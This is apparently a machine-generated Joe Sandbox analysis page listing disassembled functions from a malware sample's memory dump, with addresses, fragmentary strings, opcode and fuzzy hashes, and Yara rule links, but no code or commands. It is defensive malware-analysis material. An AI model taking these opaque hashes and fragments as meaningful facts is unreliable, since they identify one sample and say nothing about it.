/:8*, xrefs: 0042C1C4
x, xrefs: 0042C1AB

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: /:8*$x
API String ID: 0-64667063
Opcode ID: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
Instruction ID: 1aa5775c3a72f552b4e6bc18da63457a51b737a705f76bfcd9083c664813a2f3
Opcode Fuzzy Hash: 2deb9410f1475fe4b565db496a902b8e1f1b89a6457a44a6c8662009b3b1d6b5
Instruction Fuzzy Hash: E9014526A0D2B18AD301CA289980217FFD19B97700F184A99D4E6A7290C928DE05879A

Function 00423A60 Relevance: 1.7, APIs: 1, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0cee32633c80700e23e3a6d853e6cc98f7168ccf7732936f14428b6feed4f08
Instruction ID: 0c1059f1939fd580b755bdfd37faf5cc9b9fc08dac3a05aab46d246ee4cf4ccd
Opcode Fuzzy Hash: d0cee32633c80700e23e3a6d853e6cc98f7168ccf7732936f14428b6feed4f08
Instruction Fuzzy Hash: DC816976A083109FE320DF54DC817EBB7E5EBC4308F04453EFA8897291D77899068B96

Function 0042A050 Relevance: 1.7, Strings: 1, Instructions: 428COMMON

Download Yara Rule

Strings

", xrefs: 0042A3A7

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 62bc9d78861723f16aa47cdc0de941e55b0cb002e077fe1c3814b4b6b9e9140b
Instruction ID: fc6a7fef22a05f64015de1e3c3639137bf4aa38685eff02bd3fad1d047ddcb30
Opcode Fuzzy Hash: 62bc9d78861723f16aa47cdc0de941e55b0cb002e077fe1c3814b4b6b9e9140b
Instruction Fuzzy Hash: 86D11672B083259FC714CE24E48076BB7E5AB84314F88896EEC9987382E778DC55C797

Function 0041CA60 Relevance: 1.7, Strings: 1, Instructions: 414COMMON

Download Yara Rule

Strings

UR, xrefs: 0041CD44

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: UR
API String ID: 0-57707318
Opcode ID: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
Instruction ID: 8fe4e70974bd7395cce93e3b113d0d48c717d0737e0d11109a7980f2f1e1c3b0
Opcode Fuzzy Hash: dd60f0a3bd934274d443de5fabb80a09b9a3256423ee92692702c2b9107682ec
Instruction Fuzzy Hash: 61B133755583018BC720CF28CC926ABB7F1EF91364F18961DE8D59B390E338D945C79A

Function 00440130 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

`ibc, xrefs: 00440132

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID: `ibc
API String ID: 2994545307-3725910391
Opcode ID: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
Instruction ID: f6e7def48d8e745c044bbeb26ce4e72402efdfd5aebbe0cd908a1d30c76b08d8
Opcode Fuzzy Hash: 51f59b0b037f56fe4164c93a7a6ca611e73633d5b3b2a6693a0e49c4dc543b74
Instruction Fuzzy Hash: DA9114356183019BE714CF18C89166FB7E2EFD9310F18852DEA858B391EB35DC61CB86

Function 0041CECA Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

:;8, xrefs: 0041D0B0

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: :;8
API String ID: 0-370357910
Opcode ID: 93ed62283d0ade6070abc49e03dfb39d6bb0373843478f8e3a28649a63a9fbd3
Instruction ID: 6cb1dbdef0645cb70831a53be780a797aaf24bd5e036ecf1d586697fe6f75162
Opcode Fuzzy Hash: 93ed62283d0ade6070abc49e03dfb39d6bb0373843478f8e3a28649a63a9fbd3
Instruction Fuzzy Hash: 1751E0B1A483108BD714DF64C8126ABB7F2EF86318F18896DE4858B391E73AD506C75A

Function 0043F830 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

XL, xrefs: 0043F855

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: XL
API String ID: 0-2397331993
Opcode ID: cf544509813e290d1fe305b6ed588265bafe356c3c06b66d96e85f8fc0105e35
Instruction ID: aa4fe24152c52a858318c677d95a7a0c2cd254ae91a73a2a1ffc4a6790d9ff85
Opcode Fuzzy Hash: cf544509813e290d1fe305b6ed588265bafe356c3c06b66d96e85f8fc0105e35
Instruction Fuzzy Hash: C1419C38258351DFD3049F38E85066AB7E0FB4A315F0998BDD4C683361D37A99A5CB06

Function 004155DB Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

gfff, xrefs: 004155E1

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID: gfff
API String ID: 2994545307-1553575800
Opcode ID: df44e3619374106ad262fc43b683f6ef326694f7b728e93f5ec5f7c0b4c5e613
Instruction ID: 2386a0911aa688524989a8340c90167ef89acf6b9e7633cd49b65fbe482c82f4
Opcode Fuzzy Hash: df44e3619374106ad262fc43b683f6ef326694f7b728e93f5ec5f7c0b4c5e613
Instruction Fuzzy Hash: AA31C371614645CFD728CF28C9517EBB7E6ABDA304F44853ED086CB351EB349444CB86

Function 0041BFCA Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

SUQ, xrefs: 0041C004

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: SUQ
API String ID: 0-2651150828
Opcode ID: 14005623d6de7249a8b851f33e9c3310cb894edf402dd1a84a64b2ad003841e7
Instruction ID: 42c55c053425e0b0fbc475bcc9400de1786cc42e84e4724c7975db07e5bacbf3
Opcode Fuzzy Hash: 14005623d6de7249a8b851f33e9c3310cb894edf402dd1a84a64b2ad003841e7
Instruction Fuzzy Hash: EE21B1706083818FC714CF28C4A07ABBFE2AFD6328F188A5DE5E547392D335C4498766

Function 0042BA79 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

j, xrefs: 0042BAB9

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: j
API String ID: 0-2137352139
Opcode ID: c71afa6b20323cbab2bb37583566809d1d087a9fa354429759ce03f3baf40deb
Instruction ID: f136246ef15f79f812ec07c1db461e86a52f6259eac92e8ccd6656980116f0fb
Opcode Fuzzy Hash: c71afa6b20323cbab2bb37583566809d1d087a9fa354429759ce03f3baf40deb
Instruction Fuzzy Hash: 902124316083928AD3258F36945076BBBD5DFD7304F18889EE5C5AB382CB7884028B5A

Function 0042C140 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

'C, xrefs: 0042C148

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: 'C
API String ID: 0-1959375024
Opcode ID: 15b3dceed2422b8a86bb36206473813b246add45689b2aad14f1ff44a5455306
Instruction ID: 6a2eb9f9bc051ac7585a28991c81e0efb8283155a37514e0de2331f159ba5eab
Opcode Fuzzy Hash: 15b3dceed2422b8a86bb36206473813b246add45689b2aad14f1ff44a5455306
Instruction Fuzzy Hash: 6401283070C3618FC715CF69E5C0227BBE2EBD6300F1891AAD8D49B216C679C90A879F

Function 0043E6E0 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

X|T, xrefs: 0043E74F

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID: X|T
API String ID: 0-2625694639
Opcode ID: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
Instruction ID: d1cbbd9272d1375db2703005e1fbf4b2755e8cb02be92dc54b6a5afa885c6bec
Opcode Fuzzy Hash: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
Instruction Fuzzy Hash: 01014477E997A48FD3485F749CC607BB2E0EB47705F0A183DEDC9AB280C5659D00D648

Function 00416148 Relevance: 1.0, Instructions: 974COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21f1b8bd8a719ddbe8c4ea0fcc52d12380974d4c75bee49ea26b480580b85d0b
Instruction ID: 40a78145a15ed7abd580535788d63f0ce19baa41bfbb966a4b0a28bc3c900fb3
Opcode Fuzzy Hash: 21f1b8bd8a719ddbe8c4ea0fcc52d12380974d4c75bee49ea26b480580b85d0b
Instruction Fuzzy Hash: 33428C759183518BD724CF28C850BBBB7E2EB97304F1A887DD4C297292D738D941CB9A

Function 0043F0CB Relevance: .7, Instructions: 655COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a92be46bfed57546a5f9e8b5510e386b31214c144960992f720f2d1649aaaf3f
Instruction ID: 4f29358fa94e60aeb1969c962f0f8eec6781083342835fdf5c39f23cee3708bd
Opcode Fuzzy Hash: a92be46bfed57546a5f9e8b5510e386b31214c144960992f720f2d1649aaaf3f
Instruction Fuzzy Hash: E512213AB58351CFC704CF68E8D026AB7E2FB8A314F0A847DD58587361D7789855CB86

Function 004073C0 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
Instruction ID: b00a11197861395ebb150adc986e88646148ed7565683f65526ca2b7b29a586a
Opcode Fuzzy Hash: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
Instruction Fuzzy Hash: DD128631A0C7118BD724DF58D8816ABB3E1FBC4305F29893ED986A7281D738B915CB87

Function 0043F1B0 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 880181682152cefa616323442b3c08a8c19c815d652fdf005f09e039cb8f0775
Instruction ID: abfb7d9fc99d8245844b88641aefb67395d9c82b051767d5b5d882fb86d86362
Opcode Fuzzy Hash: 880181682152cefa616323442b3c08a8c19c815d652fdf005f09e039cb8f0775
Instruction Fuzzy Hash: 5D02203AB98351CFC704CF68E8D026AB7E2FBCA314F09887DD58587361D6789855CB86

Function 0043F2F6 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: febe07f69bc876771bab25917fe72384a5a6eec81e691b45ef341aed95466dd1
Instruction ID: 977cdf3f0cd69d8d458b49495e96b3aa17e1ec8412a9fe5b35dbe338883eb9b2
Opcode Fuzzy Hash: febe07f69bc876771bab25917fe72384a5a6eec81e691b45ef341aed95466dd1
Instruction Fuzzy Hash: 2BE11F39798351CFC304CF68E89122AB7E2FB8A314F09887DD58687362D778D895CB46

Function 0043F330 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b6be940e8b4a5ed499f10148e1713795b6d2de84a6bd2cd6f9f296fc740115
Instruction ID: 4c2b0347f53e4351c48a861a59ba72d78d96e03e5b29047675d502fe45a0e231
Opcode Fuzzy Hash: 67b6be940e8b4a5ed499f10148e1713795b6d2de84a6bd2cd6f9f296fc740115
Instruction Fuzzy Hash: 6EE12139758351CFC708CF68E89062AB7E2FB8A314F09887DD58587362D778D895CB46

Function 00421C80 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4178331c597e52e0b1ee20046c642d28e059b11c8c3ebee6e332c9964e1181a
Instruction ID: be10e8665051b82c00c08677856a35fb821d43083445774c7d177a85f24fb323
Opcode Fuzzy Hash: c4178331c597e52e0b1ee20046c642d28e059b11c8c3ebee6e332c9964e1181a
Instruction Fuzzy Hash: 26C12772B042209BD7149F24DC8267BB3F1EFA1314F5A842EE89597391E37CED05839A

Function 004393D0 Relevance: .5, Instructions: 453COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a13086f3fd905cad84177ff2bb7480d5109ce7f5ef2fc61a8cf37152f7f3d0dc
Instruction ID: 046a7b96ccfc149aed725a1963e6503e11e8b1bcba22f1082ba47fe7bcb8cccf
Opcode Fuzzy Hash: a13086f3fd905cad84177ff2bb7480d5109ce7f5ef2fc61a8cf37152f7f3d0dc
Instruction Fuzzy Hash: 46C1AE32A483109BD724DF25CC8172BB7A2ABCA314F19A53EE99567381D378DC01C79A

Function 0043F450 Relevance: .5, Instructions: 452COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68e25a27f3798b9ef751d0f11ca36a322ddebae79407f9de9656c32baca57b4
Instruction ID: 3e46ab952dc263d79a64f3095437ed38b519a89b60fb8defccb58f8934dfbd56
Opcode Fuzzy Hash: a68e25a27f3798b9ef751d0f11ca36a322ddebae79407f9de9656c32baca57b4
Instruction Fuzzy Hash: 98D1203A6583508FC304CF78E89126BBBE2FBCA314F09887DE98587361D678D955CB46

Function 0043F3C0 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3539716f565202b330ba76939f0e2d4d50aead702ee76b1c8be5a3672c50f991
Instruction ID: e9ede8447672369631e443a496d4183c01172dbdfa4dcc616eca2a96a95990bf
Opcode Fuzzy Hash: 3539716f565202b330ba76939f0e2d4d50aead702ee76b1c8be5a3672c50f991
Instruction Fuzzy Hash: D2D1203A758340CFC708CF68E89166AB7E2FB8A314F09887DD58587362D778D895CB46

Function 00428100 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d1a6229bbe16b85bfd67a1033bc9a6a0ebf70d07d3f0463925b7d3b15b6d579
Instruction ID: 7060ff257f1d57e8326384c3aaed6f283346be69202c19536aca7bdb8c3aaad4
Opcode Fuzzy Hash: 0d1a6229bbe16b85bfd67a1033bc9a6a0ebf70d07d3f0463925b7d3b15b6d579
Instruction Fuzzy Hash: B0815774E04224CBDF20CF54D8916AF73B1FF55310F18819DD8856B385E7389912CBA9

Function 0043FE20 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
Instruction ID: 0bfc5a374a60af3586e218f93e2c2928d82f03b66c5554fb0b2c1f037090387e
Opcode Fuzzy Hash: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
Instruction Fuzzy Hash: CC911435A083019FE714CF18D891A2BB3E2EFD9710F19952DEA858B3A5DB35DC11CB4A

Function 004390A0 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ead859f0848f669d2e829078559d8ec03b56143b4f448b9ced0e895ec2f484
Instruction ID: b66e43f3b97cf1dfe37cda8ef161d74f150199c18f2f0b2dd8126107ca88f700
Opcode Fuzzy Hash: a9ead859f0848f669d2e829078559d8ec03b56143b4f448b9ced0e895ec2f484
Instruction Fuzzy Hash: C77134756482009BE7148F29DC8172F73A6EFC9304F19983EE68657296DB788C01DB5A

Function 0043C1B0 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d3db7b38915ac6ba1d39507d845bd541b0533e411939310bf36cc07f58a00772
Instruction ID: b6c6c0bb9063e71726147574d8d4a9f3fa072b62720395db4690d828467e09fc
Opcode Fuzzy Hash: d3db7b38915ac6ba1d39507d845bd541b0533e411939310bf36cc07f58a00772
Instruction Fuzzy Hash: 5B613432F442108BD7209F69D8C126BB7A2ABD9320F1E953ED8C4B7315D6799C5287C6

Function 0042895A Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc66f1a2bb9c2a7dccc74bf005c160ac6a51bbee258682b17d2ee790622564db
Instruction ID: fd324c467d0d4d67cb19f0be7c245ecd171908bcd495dc43fa11a230d99e3a73
Opcode Fuzzy Hash: cc66f1a2bb9c2a7dccc74bf005c160ac6a51bbee258682b17d2ee790622564db
Instruction Fuzzy Hash: 7D61E7B5E01226CBCB148F54C861ABEB7B1FF56310F19829DD8466F391E7389841CB98

Function 0043EA80 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 194e4a91e1514fd88c03bb3a50c0e52568d82f3eb187bc583a51a911f9df439c
Instruction ID: 923e9729d5fc7ee5fd359d95a093cefa7cc461975f18bb850f02f0498ccbdfb7
Opcode Fuzzy Hash: 194e4a91e1514fd88c03bb3a50c0e52568d82f3eb187bc583a51a911f9df439c
Instruction Fuzzy Hash: C2413D32B183604BC724CF39889112BF7D69BCA204F19993EDCD6DB386D634ED068785

Function 004398A0 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a9930f6141a572d33e06cb3c5a38f27cfcee272b5f5079e0f2ab4ef3a0a6f8
Instruction ID: 0b4fe86eeb8762ab361a5b54057d890833e111ea9fd28b0abc4707cf8fce0a7e
Opcode Fuzzy Hash: 71a9930f6141a572d33e06cb3c5a38f27cfcee272b5f5079e0f2ab4ef3a0a6f8
Instruction Fuzzy Hash: 5C417CB2A043006BE7109E15DC41B3BB7A9DFC4704F19543DF98693351D679EC00C69B

Function 0041AD80 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
Instruction ID: 98624231f7e5e9230921b97ae011ab3bf41f8733fbbdbc26380a3e149101f663
Opcode Fuzzy Hash: 3a84865ad5c54ca8c24b5999745df1c13fc6cbfcb28eafabd1d82927ec86d330
Instruction Fuzzy Hash: 893197B01493418BC714DF29D8616ABBBF1EF83364F144A1DE5D28B390E778C881CB8A

Function 0043E051 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df0a194b946229767b7363f831e7da5b443bcd7695956afead878a2f9a9ff157
Instruction ID: 2de86218718c271af5024ca1516ac4d3c10d72851b4fdaea6f89b2b7420df16b
Opcode Fuzzy Hash: df0a194b946229767b7363f831e7da5b443bcd7695956afead878a2f9a9ff157
Instruction Fuzzy Hash: 6831A977E4032807C32C8D7D9C912A5F552ABC8120F2F833ECCAA97782E8744F0A41C4

Function 00424F91 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9da7e709b599e80dc5169ae302d838208e408c8766e6f691f40b63be7d058f75
Instruction ID: 0e1e8af2c2204aea15d5cbc23395958ecdeab842d00133b4e92973e96d65c682
Opcode Fuzzy Hash: 9da7e709b599e80dc5169ae302d838208e408c8766e6f691f40b63be7d058f75
Instruction Fuzzy Hash: 343168327587284FC3209E7CAD8133A76D2EBD5314F5E163AC8A0D72A2E274CD018ACD

Function 0043C440 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 61a7c5f3e3e1a8c8aa4b562ae2fa7e0dfe5b8cfecbd878ad23e9407211e519b2
Instruction ID: 8b2346cda91f544e30954989f53522bf0f7333ed1d7757e56fe87add5a417945
Opcode Fuzzy Hash: 61a7c5f3e3e1a8c8aa4b562ae2fa7e0dfe5b8cfecbd878ad23e9407211e519b2
Instruction Fuzzy Hash: 73117B369483089FD7209F50DC90937B7A2EBA9304F04943DE98523311E2369D109746

Function 00415882 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67144eb7c8d87826bf8fb626f82679e5028b600b171b9cc6fc605f5a26fb581
Instruction ID: 3e731032b9ba81a520a52e62ad974797521f0b7710f777a06b965f9240a14ebe
Opcode Fuzzy Hash: b67144eb7c8d87826bf8fb626f82679e5028b600b171b9cc6fc605f5a26fb581
Instruction Fuzzy Hash: F8212474A28601CBD71CCF28C8509BBF7A2EBEB300F59947EC043D32A5E938D485C64A

Function 00435410 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 68b9c81565d08f8e27d3b5cdfdde0d7ccd40a41e6fcafbbcd0beb1d44a1560b9
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 06112933A045D40EC31A8D3C8400665BFE30AB7236F5D939AF4B89B2D2D6268DCA8759

Function 00429A90 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c433cb550cfda3216090b31964c4cf69b73a36e8cd3125cab870c4421485a6
Instruction ID: 0869e638d739f0c9dc1f77a8d382a8f2a9bb23b5c0a6dc3e537d6bd1b3fecd10
Opcode Fuzzy Hash: 76c433cb550cfda3216090b31964c4cf69b73a36e8cd3125cab870c4421485a6
Instruction Fuzzy Hash: 4B01B5F1B0136147D720DE55F4C1B27B2A9AF85708F58043ED40957342DBBAFC08C299

Function 0042C0CD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

